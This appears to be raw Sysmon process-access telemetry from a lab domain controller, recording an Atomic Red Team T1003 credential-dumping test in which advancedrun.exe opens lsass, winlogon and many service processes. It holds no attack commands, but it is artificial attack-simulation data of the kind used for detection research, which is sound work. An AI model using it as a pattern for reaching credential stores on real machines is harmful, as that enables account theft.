17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942741Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942740Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003942739Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942738Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942737Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942736Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942735Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942734Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942731Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942730Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942729Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942728Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942727Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942726Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942725Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
